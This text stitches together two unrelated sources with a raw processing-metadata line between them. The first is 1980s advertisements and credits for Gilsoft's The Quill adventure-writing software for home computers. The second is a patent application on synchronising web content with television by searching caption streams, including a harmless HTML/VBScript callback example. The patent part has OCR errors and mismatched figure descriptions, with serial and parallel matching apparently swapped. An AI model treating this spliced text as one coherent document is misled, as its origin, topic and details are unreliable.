EXTENDED SPECTRUM BASIC
WITH
WHITE NOISE and GRAPHICS £5.95
A collection of Machine Code routines to add over 20 extra commands to
Basic. These give total control over the screen via a window which can be
scrolled in any of eight directions, inverted, cleared, bordered and shaded (thus
extending the normal range of colours). White Noise produces true
explosions, gunshot and other sound effects, includes many other routines.
Supplied with a comprehensive manual.
EDUCATIONAL TAPES
CESIL £5.95
If you are starting O level Computer studies this year you may well
be required to learn the CESIL language. So we have produced CESIL
interpreters for the ZX Spectrum, 16K 2X81 and Dragon 32 which will allow
you to write and run CESIL programs on your home computer thus gaining
a familiarity with the language that examinations require. Supplied with full
manual. Please specify machine type when ordering.
HAL £5.95
This is another O level language used in some areas and is available for the
ZX Spectrum only. Supplied with instructions.
VISUAL PROCESSOR £5.95
Provides an on screen display of a simple micro-processor showing its
internal operation as it runs programs. Full manual supplied. Available for the
ZX Spectrum Only.
WRITE YOUR OWN MACHINE CODE ADVENTURES WITH
THE QUILL
The Quill is a major new utility written in machine code which allows even the
novice programmer to produce high speed machine code adventures of
superior quality to many available at the moment without any knowledge of
machine code whatsoever.
Using a menu selection system you may create well over 200 locations,
describe them and connect routes between them. You may then fill them
with objects and problems of your choice. Having tested your adventure you
may alter and experiment with any section of the with the greatest of ease. A part
formed adventure may be saved to tape for later completion. When you have
done so The Quill will allow you to produce a copy of your adventure which
will run independently of the main Quill editor, so that you may give copies
away to your friends. The Quill is provided with a detailed tutorial manual
which covers every aspect of the use in writing adventures. It is impossible to
describe all the features of this amazing program in such a small space, so we
have produced a demonstration cassette which gives further information and
an example of its use. This cassette is available at
£2.00 and The Quill itself is £14.95.
FOR THE 48K SPECTRUM AT £14.95
Our Software is now available from many computer shops national-
wide, or direct from us by post or phone. SAE for details. Dealer
enquiries welcome.
GILSOFT
30 Hawthorne Road, Barry
South Glam CF6 8LE
Tel: (0446) 736369
THE QUILL
FOR THE 48K SPECTRUM AT £14.95
The Quill is a major new utility written in machine code which allows even the novice programmer to produce high speed machine code adventures of superior quality to many available at the moment without any knowledge of machine code whatsoever.
Using a menu selection system you may create well over 200 locations, describe them and connect routes between them. You may then fill them with objects and problems of your choice. Having saved your adventure you may alter and experiment with any section with the greatest of ease. A part formed adventure may be saved to tape for later completion. When you have done so The Quill will allow you to produce a copy of your adventure which will run independently of the main Quill editor, so that you may give copies away to your friends. The Quill is provided with a detailed tutorial manual which covers every aspect of its use in writing adventures.
We also have a range of machine code adventures which is growing constantly. Titles currently include:
TIMELINE & TASKS ........................................... £4.95
A superb 16K adventure in which you must locate time machine to return to the present. Plus a collection of mind stimulating puzzles.
MAGIC CASTLE ........................................... £4.95
Try to rescue the princess from the castle, but beware of booby traps and vampires! A gripping adventure for the 48K Spectrum.
DIAMOND TRAIL ........................................... £4.95
Recover the Sinclair diamond after a daring robbery. First you must overcome many problems in a city fraught with danger and intrigue. This is our latest adventure for the 48K Spectrum.
GILSOFT wish MicroAdventurer every success and as a special launch offer, if you return the coupon below with your order you may purchase 'The Quill' at a special discount price of only £12.95. Please note that the offer closes on 30th November 1983.
Please rush me:—
<table>
<thead>
<tr>
<th>QTY</th>
<th>TITLE</th>
<th>PRICE</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td>The Quill</td>
<td>12.95</td>
</tr>
<tr>
<td></td>
<td>Magic Castle</td>
<td>4.95</td>
</tr>
<tr>
<td></td>
<td>Diamond Trail</td>
<td>4.95</td>
</tr>
<tr>
<td></td>
<td>Timeline/Task</td>
<td>4.95</td>
</tr>
</tbody>
</table>
* I enclose a cheque/ Postal order payable to GILSOFT for £____________ or
* Please charge to my Access/ Barclaycard account
* Please delete as applicable.
No.
Signature
Name
Address
GILSOFT
30 Hawthorn Road, Barry
South Glam. CF6 8LE
Tel: (0446) 736369
http://8bitag.com/info
The Quill
Write your own machine code adventures
Without any knowledge of machine code whatsoever
FOR THE 48K SPECTRUM AT £14.95
Now available in larger branches of W. H. Smith, Boots, John Menzies and from many computer shops nationwide, or direct from us by post or telephone.
SAE for full details of our range.
Dealer enquiries welcome.
GILSOFT
30 Hawthorn Road
Barry
South Glamorgan
CF6 8LE
Tel (0446) 732765
The Illustrator
Now you can add graphics to your Quill Written Adventure.
For use in conjunction with The Quill Adventure Writing System on the 48K Spectrum.
Please rush me The Illustrator for the 48K Spectrum.
Name ...........................................
Address ...........................................
...........................................
SIGNATURE...........................................
Available late November 1984
I enclose a cheque / postal order for £14.95
Please debit my Access / VISA card no - - - - - - - - - - -
Send to:
GILSOFT
30 Hawthorn Road
Barry
South Glamorgan
CF6 8LE
From
GILSOFT
The Welsh Wizards of Adventure
THE QUILL
ADVENTURE WRITER
FOR THE
SPECTRUM 48K
AND
COMMODORE 64
48K SPECTRUM CASSETTE £14.95
COMMODORE 64 CASSETTE £14.95
COMMODORE 64 DISK £19.95
SELECTED TITLES AVAILABLE FROM
W.H. Smith, Boots, John Menzies, and from
Good Computer Shops Nationwide
Or Direct From Us
By Post or Telephone
GILSOFT
30 Hawthorn Road
Barry
South Glamorgan
☎ (0446) 732765
Credit Card Order Line 24 hour service ☎ : (0222) 41361 ext 430
---
The Quill
& The Illustrator
The Graphic Adventure Writing System
For The 48K Spectrum
The Quill £14.95
The Illustrator £14.95
GILSOFT
30, Hawthorn Road
Barry, South Glam
0446 - 732765
From Computer shops Nationwide
Or direct from us by post or phone
Credit Card Order Line Staffed 24 Hours Daily
0222 - 41361 Ext 430
http://8bitag.com/info
The Adventure Writing System
The Quill
Available For
- Spectrum 48K: £14.95
- CBM 64: £14.95
- Amstrad 464: £16.95
- Oric/Atmos: Coming Soon
The Illustrator
Available For
- Spectrum 48K: £14.95
- CBM 64: Coming Soon
- Amstrad 464: £16.95
GILSOFT
30, Hawthorn Road
Barry, South Glam
0446 - 732765
From Computer Shops Nationwide
Or Direct From Us By Post or Phone
Credit Card Order Line
Staffed 24 Hours Daily
0222 - 41361 Ext 430
The highly acclaimed
Graphic Adventure
Writing System
THE QULL & ILLUSTRATOR
GILSOFT
INTERNATIONAL LTD
2 Park Crescent, Barry
S. Glam CF6 8HD.
Tel: 0446 732765
Now at a Bargain Price!
The Quill – £3.99
The Illustrator – £3.99
The Quill and Illustrator Twin Pack – £5.99
Available for The Spectrum,
CBM 64 and Amstrad CPC.
State which machine and add
50p p&p. Cheques/PO’s to:
Selected AdventureWriter advertising...
Wanted: Master of the Universe
- The job requires imagination - not programming.
- All the adventure games you ever dreamed of.
- Your story becomes a machine language adventure - automatically.
- The games are yours to trade or sell (great for schools).
- Hundreds of locations, objects & understood words possible in every game.
- For Commodore,^IBM,^Atari,^Apple.^
- Authors, teachers - ask about Dialog.
Call now for details:
1-800-621-4109 In Illinois 312-570-9700
CodeWriter
The world's leading supplier of program design software
7847 N. Caldwell Ave., Niles, IL 60648
Wanted: Master of the Universe
- The job requires imagination – not programming.
- All the adventure games you ever dreamed of.
- Your story becomes a machine language adventure – automatically.
- The games are yours to trade or sell (great for schools).
- Hundreds of locations, objects & unexpected words possible in every game.
- For Commodore™, IBM™, Atari™, Apple™.
- Authors, teachers – ask about Dialog.
Call now for details: 1-800-621-4109
In Illinois 312-470-5700
CodeWriter™
The world’s leading supplier of program design software.
7847 N. Caldwell Ave., Niles, IL 60648
http://8bitag.com/info
The Quill Credits
The Quill – originally created by Graeme Yeandle
Oric 1/ATMOS version by Tim Gilberts
BBC/Electron version by Neil Fleming-Smith
Sinclair QL version by Huw H.Powell
The Illustrator by Tim Gilberts
The Patch, The Press & The Expander by Phil Wade
Characters by Kevin Maddocks
Acknowledgements...
Information collated from original documentation and various other sources
(see links section)
Thanks also to...
Tim Gilberts
Stefan Vogt
Philip Richmond
Andy Ford, Anthony Hope & the members of the Stardot forums
Lionel Ange
|
{"Source-Url": "http://8bitag.com/info/documents/Quill-AdventureWriter-Reference.pdf", "len_cl100k_base": 15164, "olmocr-version": "0.1.53", "pdf-total-pages": 41, "total-fallback-pages": 0, "total-input-tokens": 67876, "total-output-tokens": 15348, "length": "2e13", "weborganizer": {"__label__adult": 0.0011959075927734375, "__label__art_design": 0.004241943359375, "__label__crime_law": 0.0006318092346191406, "__label__education_jobs": 0.00820159912109375, "__label__entertainment": 0.002391815185546875, "__label__fashion_beauty": 0.0007748603820800781, "__label__finance_business": 0.0012941360473632812, "__label__food_dining": 0.0007343292236328125, "__label__games": 0.219970703125, "__label__hardware": 0.007289886474609375, "__label__health": 0.0003559589385986328, "__label__history": 0.0006952285766601562, "__label__home_hobbies": 0.0011472702026367188, "__label__industrial": 0.0007939338684082031, "__label__literature": 0.0018014907836914065, "__label__politics": 0.00035071372985839844, "__label__religion": 0.0013866424560546875, "__label__science_tech": 0.00951385498046875, "__label__social_life": 0.0003039836883544922, "__label__software": 0.11041259765625, "__label__software_dev": 0.6240234375, "__label__sports_fitness": 0.000934123992919922, "__label__transportation": 0.0009455680847167968, "__label__travel": 0.00044155120849609375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51413, 0.04496]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51413, 0.06512]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51413, 0.83456]], "google_gemma-3-12b-it_contains_pii": [[0, 1822, false], [1822, 3801, null], [3801, 5575, null], [5575, 7862, null], [7862, 10281, null], [10281, 12216, null], [12216, 13193, null], [13193, 15067, null], [15067, 16566, null], [16566, 17989, null], [17989, 19389, null], [19389, 19826, null], [19826, 23697, null], [23697, 25461, null], [25461, 26743, null], [26743, 27849, null], [27849, 28671, null], [28671, 29254, null], [29254, 29400, null], [29400, 29718, null], [29718, 30527, null], [30527, 31389, null], [31389, 31876, null], [31876, 32510, null], [32510, 32812, null], [32812, 33628, null], [33628, 33882, null], [33882, 34924, null], [34924, 35151, null], [35151, 35961, null], [35961, 37940, null], [37940, 39971, null], [39971, 44515, null], [44515, 46965, null], [46965, 48000, null], [48000, 48818, null], [48818, 48818, null], [48818, 49630, null], [49630, 50251, null], [50251, 50860, null], [50860, 51413, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1822, true], [1822, 3801, null], [3801, 5575, null], [5575, 7862, null], [7862, 10281, null], [10281, 12216, null], [12216, 13193, null], [13193, 15067, null], [15067, 16566, null], [16566, 17989, null], [17989, 19389, null], [19389, 19826, null], [19826, 23697, null], [23697, 25461, null], [25461, 26743, null], [26743, 27849, null], [27849, 28671, null], [28671, 29254, null], [29254, 29400, null], [29400, 29718, null], [29718, 30527, null], [30527, 31389, null], [31389, 31876, null], [31876, 32510, null], [32510, 32812, null], [32812, 33628, null], [33628, 33882, null], [33882, 34924, null], [34924, 35151, null], [35151, 35961, null], [35961, 37940, null], [37940, 39971, null], [39971, 44515, null], [44515, 46965, null], [46965, 48000, null], [48000, 48818, null], [48818, 48818, null], [48818, 49630, null], [49630, 50251, null], [50251, 50860, null], [50860, 51413, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51413, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51413, null]], "pdf_page_numbers": [[0, 1822, 1], [1822, 3801, 2], [3801, 5575, 3], [5575, 7862, 4], [7862, 10281, 5], [10281, 12216, 6], [12216, 13193, 7], [13193, 15067, 8], [15067, 16566, 9], [16566, 17989, 10], [17989, 19389, 11], [19389, 19826, 12], [19826, 23697, 13], [23697, 25461, 14], [25461, 26743, 15], [26743, 27849, 16], [27849, 28671, 17], [28671, 29254, 18], [29254, 29400, 19], [29400, 29718, 20], [29718, 30527, 21], [30527, 31389, 22], [31389, 31876, 23], [31876, 32510, 24], [32510, 32812, 25], [32812, 33628, 26], [33628, 33882, 27], [33882, 34924, 28], [34924, 35151, 29], [35151, 35961, 30], [35961, 37940, 31], [37940, 39971, 32], [39971, 44515, 33], [44515, 46965, 34], [46965, 48000, 35], [48000, 48818, 36], [48818, 48818, 37], [48818, 49630, 38], [49630, 50251, 39], [50251, 50860, 40], [50860, 51413, 41]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51413, 0.19386]]}
|
olmocr_science_pdfs
|
2024-12-11
|
2024-12-11
|
8a1dedabeefc6abb4a9582e15478a6451560346b
|
Various technologies and techniques are disclosed that relate to providing interactive television by synchronizing content to live and/or recorded television shows. Content is synchronized without the use of in-band triggers. A broadcast stream is received, and search/action pairs are received from a transmission path, such as from the Internet or user. When the search criteria are found in the broadcast stream, the associated action is performed and the content is synchronized with the show. An application programming interface is used to facilitate synchronization, and includes a set search method, a search function template method, and a clear search method. The set search method initiates searching of the broadcast stream and registers one or more callback methods for performing the associated action when the match is found. The search function template serves as the template for registering the callback methods. The clear search method clears the system resources from the search.
START
RECEIVE AT LEAST ONE LIVE AND/OR RECORDED BROADCAST STREAM (AUDIO, VIDEO, DATA, ETC.)
RECEIVE A SET OF SEARCH/ACTION PAIR INSTRUCTIONS (E.G. IN HTML OR OTHER FILE, OR STRING) FROM A TRANSMISSION PATH (E.G. FROM INTERNET, USER INPUT, AND/OR FROM OTHER SOURCE)
PROCESS THE BROADCAST STREAM TO EXTRACT PORTIONS OF CONTENT (E.G. CLOSE CAPTION SUBSTREAM, SUBTITLE SUBSTREAM, ETC.)
DETERMINE THAT SEARCH CRITERIA (PARTICULAR STRING, AUDIO, VIDEO, ETC.) HAS BEEN FOUND/MATCHED (FULL OR PARTIAL) IN EXTRACTED CONTENT (E.G. USE SERIAL OR PARALLEL SEARCH)
INITIATE ASSOCIATED ACTION AND SYNCHRONIZE ACTION WITH SHOW BEING PLAYED (E.G. USE TIMESHIRING)
FIG. 3
END
START
RECEIVE AT LEAST ONE LIVE AND/OR RECORDED BROADCAST STREAM (AUDIO, VIDEO, DATA, ETC.)
RECEIVE SEARCH PAGE (E.G. IN HTML OR OTHER FILE, ETC.) WITH SEARCH/ACTION PAIRS FROM A TRANSMISSION PATH (E.G. FROM INTERNET, USER INPUT, AND/OR FROM OTHER SOURCE)
BIND THE SEARCH PAGE TO AT LEAST ONE SEARCH OBJECT (E.G. CALL SEARCH PROGRAM AND CREATE SEARCH OBJECT)
FROM SEARCH OBJECT, REGISTER CALLBACK METHOD(S) SO METHODS IN SEARCH PAGE FOR ASSOCIATED ACTIONS CALLED WHEN MATCH FOUND
CALL CALLBACK METHOD TO PERFORM ASSOCIATED ACTION WHEN MATCH TO SEARCH CRITERIA FOUND IN BROADCAST STREAM
SYNCHRONIZE ASSOCIATED ACTION WITH SHOW
END
FIG. 4
SEARCH CLASS
260
+ClearSearch([in] dwCookie)
FIG. 5
ONLOAD 270
SRCH MARY 272
MARY 274
ACTMARY 276
SRCH HAD 278
HAD 280
ACT HAD 282
SRCH LITTLE 284
LITTLE 286
ACTLITTLE 288
SRCH LAMB 290
LAMB 292
ACT LAMB 294
FIG. 6
<HTML>
<!-- hooks events to web pages -->
<BODY OnLoad="Bind();">
<OBJECT ID="Binder" classID="clsid:12341235-1234-1234-1234-123412341234">
<!-- control that does searching -->
<OBJECT ID="MCESearch" classID="CLSID:12341234-1234-1234-1234-123412341234">
<PARAM NAME="Param1" VALUE=100>
</OBJECT>
SCRIPT language=vbscript>
// setup search callbacks
sub bind
varCCSearcher = Binder.Bind(MCECCSearch, "SearchEvent")
Endsub
sub window_onload
MCESearch.SetSearch("CC1","ActMary", "Mary", Once )
Endsub
sub ActMary(ccMatched, idSearch, timeStart, timeEnd)
<do something about Mary >
MCESearch.SetSearch("CC1", "ActHad", "Had", Once)
Endsub
sub ActHad(ccMatched, idSearch, timeStart, timeEnd)
<do something with Had>
MCESearch.SetSearch("CC1", "ActLittle", "Little", Once)
Endsub
sub ActLittle (ccMatched, idSearch, timeStart, timeEnd)
<do something Little>
MCESearch.SetSearch("CC1", "ActLamb", "Lamb", Once)
Endsub
sub ActLamb (ccMatched, idSearch, timeStart, timeEnd)
<do something wooly>
... Code to launch page for little lamb quiz ...
Endsub
</SCRIPT>
</BODY>
</HTML>
FIG. 7
<HTML>
<!-- hooks events to web pages -->
... same header as other example ...
SCRIPT language=vbscript>
// setup search callbacks
sub bind
varCCSearcher = Binder.Bind(MCECCSearch, "SearchEvent")
endsub
sub window_onload
// terminate search if don't find it
cMary = MCESearch.SetSearch("CC1","ActLine1", "Mary", Once, 1 )
cHad = MCESearch.SetSearch("CC1","ActLine1", "Had", Once, 2 )
cLittle = MCESearch.SetSearch("CC1","ActLine1", "A Little", Once, 3 )
cLamb = MCESearch.SetSearch("CC1","DoneLine1", "Lamb", Once, 4 )
cTout1 = MCESearch.SetSearch("CC1","DoneLine1", "**", Once, 5, 5.0 )
endsub
sub ActLine1(ccMatched, idSearch, timeStart, timeEnd)
switch(ccMatch)
case 'Mary': < do something about Mary> break;
case 'Had': < do something about Had> break;
case 'A Little': <do something Little> break;
endswitch
endsub
sub DoneLine1(ccMatched, idSearch, timeStart, timeEnd)
ClearSearch(cMary); ClearSearch(cHad); ClearSearch(cLittle);
ClearSearch(cLamb); ClearSearch(cTout1);
if(ccMatch == 'Lamb')
<code to launch page for little lamb quiz >
endif
... do other lines ...
endsub
</SCRIPT>
</BODY>
</HTML>
FIG. 9
The Mary Had A Little Lamb
Show
Page 2
QUIZ: Test Your Little Lamb Knowledge
TV
Window
TRIGGERLESS INTERACTIVE TELEVISION
BACKGROUND
[0001] The computer and television industries are making large strides in developing technology that combines the functionality of the computer and the television. For instance, the computer is becoming more adept at rendering audio and video data in a manner that simulates the broadcast infrastructure of the television industry. Likewise, the television and computer industries are making improvements in delivering interactive television content that tie web-based and/or other content to television broadcast content. One example of such interactive television includes displaying particular advertiser’s web page when their commercials are broadcast. Another example of interactive television includes displaying an interactive game that is in synchrony with the television broadcast.
[0002] In order to synchronize web-based and/or other content with television video content, the broadcaster must typically send triggers in-band with the video. Triggers are synchronization events and references to applications, typically web pages, that perform the actions. Examples of industry standards that support such triggers include the Advanced TeleVision Forum (ATVF) standard and the Broadcast HTML standard. When using triggers in this fashion, some sort of back channel is typically required in order to send the actual web pages since the in-band channel is too narrow to send much content. Furthermore, in-band triggers require the broadcaster, which generates the web content and triggers, to work hand in hand with the head end side to get those triggers sent. This relationship between the broadcaster and head end has traditionally been problematic because, among other reasons, the television broadcasts have to be modified in order to include the required in-band triggers.
SUMMARY
[0003] Described herein are various technologies and techniques for providing interactive television by synchronizing content to television shows. In one aspect, content is synchronized without the use of in-band triggers. As one non-limiting example, a broadcast stream is received, such as a particular live or recorded television show. A set of search instructions are received from a transmission path, such as a web page downloaded over a separate transmission path such as the Internet and/or from search instructions entered by the user. The search instructions include a search criteria and one or more actions to be performed when that search criteria is found in a particular portion of the broadcast stream. When the search criteria are found in the broadcast stream, the associated one or more actions are performed and the content is synchronized with the show being played.
[0004] In another aspect, an application programming interface is provided to facilitate the synchronizing of content to television shows. The application programming interface includes a set search method, a search function template method, and a clear search method. The set search method initiates searching of a particular broadcast stream to locate the value (e.g., string, etc.) to match and registers one or more callback methods that should be called to perform a particular action when the match is found. The search function template serves as the template for registering the callback methods. The clear search method clears the system resources associated with the particular search.
[0005] This Summary is provided to introduce a selection of concepts in a simplified form that are further described below in the Detailed Description. This Summary is not intended to identify key features or essential features of the claimed subject matter, nor is it intended to be used as an aid in determining the scope of the claimed subject matter.
BRIEF DESCRIPTION OF THE DRAWINGS
[0006] FIG. 1 is a diagrammatic view of a computer system of one aspect of the present invention.
[0007] FIG. 2 is a diagrammatic view of a search program operating on the computer system of FIG. 1 in one aspect of the present invention.
[0008] FIG. 3 is a high-level process flow diagram for one aspect of the system of FIG. 1.
[0009] FIG. 4 is a process flow diagram for one aspect of the system of FIG. 1 illustrating the stages involved in synchronizing content with a show.
[0010] FIG. 5 is a class diagram for one aspect of the system of FIG. 1 illustrating the methods used in synchronizing content with a show.
[0011] FIG. 6 is a process flow diagram for one aspect of the system of FIG. 1 illustrating the stages involved in performing serial matching according to an illustrative example.
[0012] FIG. 7 is a diagram for one aspect of the system of FIG. 1 illustrating an HTML page with VBScript used for performing parallel matching according to the illustrative example of FIG. 6.
[0013] FIG. 8 is a process flow diagram for one aspect of the system of FIG. 1 illustrating the stages involved in performing parallel matching according to an illustrative example.
[0014] FIG. 9 is a diagram for one aspect of the system of FIG. 1 illustrating an HTML page with VBScript used for performing serial matching according to the illustrative example of FIG. 8.
[0015] FIG. 10 is a simulated screen for one aspect of the system of FIG. 1 that illustrates synchronizing content with a television show based on the hypothetical searches represented in FIGS. 6-9.
DETAILED DESCRIPTION
[0016] For the purposes of promoting an understanding of the principles of the invention, reference will now be made to the embodiments illustrated in the drawings and specific language will be used to describe the same. It will nevertheless be understood that no limitation of the scope of the invention is thereby intended. Any alterations and further modifications in the described embodiments, and any further applications of the principles of the invention as described herein are contemplated as would normally occur to one skilled in the art to which the invention relates.
[0017] There are various ways to synchronize web-based and/or other content with television video content. Typically,
the broadcaster sends triggers in-band with the video, such as using the ATVEF or Broadcast HTML standards. The broadcaster typically must modify the television broadcast to include the in-band triggers and must work hand in hand with the head end side to get those triggers sent. Various technologies and techniques are discussed herein that allow web-based and/or other content to be synchronized with video content without using in-band triggers and/or without modifying the television broadcast stream. The term broadcast stream used herein is meant to include live and/or recorded broadcast streams.
[0018] FIG. 1 illustrates an example of a suitable computing system environment 100 on which the invention may be implemented. The computing system environment 100 is only one example of a suitable computing environment and is not intended to suggest any limitation as to the scope of use or functionality of the invention. Neither should the computing environment 100 be interpreted as having any dependency or requirement relating to any one or combination of components illustrated in the exemplary operating environment 100.
[0019] The invention is operational with numerous other general purpose or special purpose computing system environments or configurations. Examples of well known computing systems, environments, and/or configurations that may be suitable for use with the invention include, but are not limited to, personal computers, server computers, handheld or laptop devices, multiprocessor systems, microprocessor-based systems, set top boxes, programmable consumer electronics, network PCs, minicomputers, mainframe computers, mobile telephones, PDAs, distributed computing environments that include any of the above systems or devices, and the like.
[0020] The invention may be described in the general context of computer-executable instructions, such as program modules, being executed by a computer. Generally, program modules include routines, programs, objects, components, data structures, etc. that perform particular tasks or implement particular abstract data types. The invention may also be practiced in distributed computing environments where tasks are performed by remote processing devices that are linked through a communications network. In a distributed computing environment, program modules may be located in both local and remote computer storage media including memory storage devices.
[0021] With reference to FIG. 1, an exemplary system for implementing the invention includes a general purpose computing device in the form of a computer 110. Components of computer 110 may include, but are not limited to, a processing unit 120, a system memory 130, and a system bus 121 that couples various system components including the system memory to the processing unit 120. The system bus 121 may be any of several types of bus structures including a memory bus or memory controller, a peripheral bus, and a local bus using any of a variety of bus architectures. By way of example, and not limitation, such architectures include Industry Standard Architecture (ISA) bus, Micro Channel Architecture (MCA) bus, Enhanced ISA (EISA) bus, Video Electronics Standards Association (VESA) local bus, and Peripheral Component Interconnect (PCI) bus also known as Mezzanine bus.
[0022] Computer 110 typically includes a variety of computer readable media. Computer readable media can be any available media that can be accessed by computer 110 and includes both volatile and nonvolatile media, removable and non-removable media. By way of example, and not limitation, computer readable media may comprise computer storage media and communication media. Computer storage media includes both volatile and nonvolatile, removable and non-removable media implemented in any method or technology for storage of information such as computer readable instructions, data structures, program modules or other data. Computer storage media includes, but is not limited to, RAM, ROM, EEPROM, flash memory or other memory technology, CD-ROM, digital versatile disks (DVD) or other optical disk storage, magnetic cassettes, magnetic tape, magnetic disk storage or other magnetic storage devices, or any other medium which can be used to store the desired information and which can be accessed by computer 110. Communication media typically embodies computer readable instructions, data structures, program modules or other data in a modulated data signal such as a carrier wave or other transport mechanism and includes any information delivery media. The term “modulated data signal” means a signal that has one or more of its characteristics set or changed in such a manner as to encode information in the signal. By way of example, and not limitation, communication media includes wired media such as a wired network or direct-wired connection, and wireless media such as acoustic, RF, infrared and other wireless media. Combinations of the any of the above should also be included within the scope of computer readable media.
[0023] The system memory 130 includes computer storage media in the form of volatile and/or nonvolatile memory such as read only memory (ROM) 131 and random access memory (RAM) 132. A basic input/output system (BIOS), containing the basic routines that help to transfer information between elements within computer 110, such as during start-up, is typically stored in ROM 131. RAM 132 typically contains data and/or program modules that are immediately accessible to and/or presently being operated on by processing unit 120. By way of example, and not limitation, FIG. 1 illustrates operating system 134, application programs 135, other program modules 136, and program data 137.
[0024] The computer 110 may also include other removable/non-removable, volatile/nonvolatile computer storage media. By way of example only, FIG. 1 illustrates a hard disk drive 140 that reads from or writes to non-removable, nonvolatile magnetic media, a magnetic disk drive 151 that reads from or writes to a removable, nonvolatile magnetic disk 152, and an optical disk drive 155 that reads from or writes to a removable, nonvolatile optical disk 156 such as a CD ROM or other optical media. Other removable/non-removable, volatile/nonvolatile computer storage media that can be used in the exemplary operating environment include, but are not limited to, magnetic tape cassettes, flash memory cards, digital versatile disks, digital video tape, solid state RAM, solid state ROM, and the like. The hard disk drive 141 is typically connected to the system bus 121 through a non-removable memory interface such as interface 140, and magnetic disk drive 151 and optical disk drive 155 are typically connected to the system bus 121 by a removable memory interface, such as interface 150.
[0025] The drives and their associated computer storage media discussed above and illustrated in FIG. 1, provide
storage of computer readable instructions, data structures, program modules and other data for the computer 110. In FIG. 1, for example, hard disk drive 141 is illustrated as storing operating system 144, application programs 145, other program modules 146, and program data 147. Note that these components can either be the same as or different from operating system 134, application programs 135, other program modules 136, and program data 137. Operating system 144, application programs 145, other program modules 146, and program data 147 are given different numbers here to illustrate that, at a minimum, they are different copies. A user may enter commands and information into the computer 20 through input devices such as a keyboard 162 and pointing device 161, commonly referred to as a mouse, trackball or touch pad. Other input devices (not shown) may include a microphone, joystick, game pad, satellite dish, scanner, or the like. These and other input devices are often connected to the processing unit 120 through a user input interface 160 that is coupled to the system bus, but may be connected by other interface and bus structures, such as a parallel port, game port or a universal serial bus (USB).
A monitor 191 or other type of display device is also connected to the system bus 121 via an interface, such as a video interface 190. Computer 110 may be integrally positioned with or separate from monitor 191. Monitor 191 may be configured to display items of different sizes and to display items in different colors. Examples of other suitable display devices include, but are not limited to, computer monitors, televisions, PDA displays, displays of other portable devices, and so forth. In addition to the monitor, computers may also include other peripheral output devices such as speakers 197 and printer 196, which may be connected through a output peripheral interface 190 and integrally positioned with or separate from computer 110. Non-limiting examples of speakers include computer speakers, stereo systems, amplifiers, radios, television audio systems, and so forth.
The computer 110 may operate in a networked environment using logical connections to one or more remote computers, such as a remote computer 180. The remote computer 180 may be a personal computer, a server, a router, a network PC, a peer device, or other common network node, and typically includes many or all of the elements described above relative to the computer 110, although only a memory storage device 181 has been illustrated in FIG. 1. In one embodiment, the remote computer 180 may include a TV broadcast station, a cable broadcast station, and/or a satellite transmission system. The broadcast signals transmitted to between the computer 110 and the remote computer 180 may include analog and digital signals that are transmitted over any suitable communication link. The logical connections depicted in FIG. 1 include a local area network (LAN) 171 and a wide area network (WAN) 173, but may also include other networks. Such networking environments are commonplace in offices, enterprise-wide computer networks, intranets and the Internet.
When used in a LAN networking environment, the computer 110 is connected to the LAN 171 through a network interface or adapter 170. When used in a WAN networking environment, the computer 110 typically includes a modem 172 or other means for establishing communications over the WAN 173, such as the Internet. The modem 172, which may be internal or external, may be connected to the system bus 121 via the user input interface 160, or other appropriate mechanism. In a networked environment, program modules depicted relative to the computer 110, or portions thereof, may be stored in the remote memory storage device. By way of example, and not limitation, FIG. 1 illustrates remote application programs 185 as residing on memory device 181. It will be appreciated that the network connections shown are exemplary and other means of establishing a communications link between the computers may be used.
Turning now to FIG. 2 with continued reference to FIG. 1, a search program 200 operating on computer 110 in one aspect of the present invention is illustrated. In the example illustrated on FIG. 2, search program 200 is one of application programs 145 that reside on computer 110. Alternatively or additionally, one or more parts of search program 200 can be part of application programs 135 in RAM 132, or remote computer 181 with remote application programs 185, or other such variations as would occur to one in the computer software art.
Search program 200 includes business logic 202. Business logic 202 is responsible for carrying out some or all of the techniques described herein. Business logic includes logic for retrieving search instructions 204 that were received from a transmission path, such as one separate from a broadcast stream and logic for processing the broadcast stream to look for search criteria and determine a match 206. Business logic 202 also includes logic for registering one or more callback methods so one or more actions can be performed when a match is determined 208. Business logic 202 of search program 200 also includes logic for deleting system resources used in the search 210. In FIG. 2, business logic 202 is shown to reside on computer 110 as part of application programs 145. However, it will be understood that business logic 202 can alternatively or additionally be embodied as computer-executable instructions on one or more computers and/or in different variations than shown on FIG. 2. As one non-limiting example, one or more parts of business logic 202 could alternatively or additionally be implemented as an XML web service that resides on an external computer that is called when needed.
Also shown on FIG. 2 are search instructions 212 that were received from a transmission path, such as one separate from the broadcast stream. Search instructions 212 contain one or more sets of search/action pairs 214. As one non-limiting example, search instructions 212 are contained in a web page that communicates with search program 200. Each search/action pair 214 includes search criteria 216 and one or more actions 218 to be performed when the particular search criteria 216 is found in the broadcast stream. Search instructions 212 are retrieved by business logic 204. Search criteria 216 are used by business logic 206 as the search criteria to look for in the broadcast stream. Business logic 208 registers callback methods for the actions 218 so that the actions 218 are performed when the search criteria is matched with the broadcast stream.
